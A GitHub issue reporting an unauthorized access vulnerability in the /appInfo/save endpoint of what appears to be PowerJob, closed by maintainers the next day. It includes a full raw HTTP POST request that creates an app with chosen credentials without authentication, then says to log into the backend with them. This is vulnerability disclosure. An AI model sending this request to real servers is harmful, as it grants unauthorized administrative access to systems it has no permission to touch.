Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

I want to report an unauthorized access vulnerability #586

Closed
testnet0 opened this issue Mar 15, 2023 · 0 comments
Closed

I want to report an unauthorized access vulnerability #586

testnet0 opened this issue Mar 15, 2023 · 0 comments
Assignees
Labels
bug Something isn't working

Comments

@testnet0
Copy link

Describe the bug
A clear and concise description of what the bug is.
Hello teams,I want to report an unauthorized access vulnerability
There is an unauthorized access on the /appInfo/save interface.
Just send this data packet:

POST /appInfo/save HTTP/1.1
Host: test.cn:7700
Content-Length: 36
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Content-Type: application/json;charset=UTF-8
Origin: http://test.cn:7700
Referer: http://test.cn:7700/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{"appName":"test","password":"test"}

It creates a app without requiring any permissions.

image

The next step is to log in to the backend using the username and password you created.
image

then
To Reproduce
Steps to reproduce the behavior.

Expected behavior
A clear and concise description of what you expected to happen.

Environment

  • PowerJob Version: [e.g. 3.0.0]
  • Java Version: [e.g. OpenJDK 8]
  • OS: [e.g. CentOS 8.1]

Screenshots
If applicable, add screenshots to help explain your problem.

Additional context
Add any other context about the problem here.

@testnet0 testnet0 added the bug Something isn't working label Mar 15, 2023
@KFCFans KFCFans closed this as completed Mar 16, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

2 participants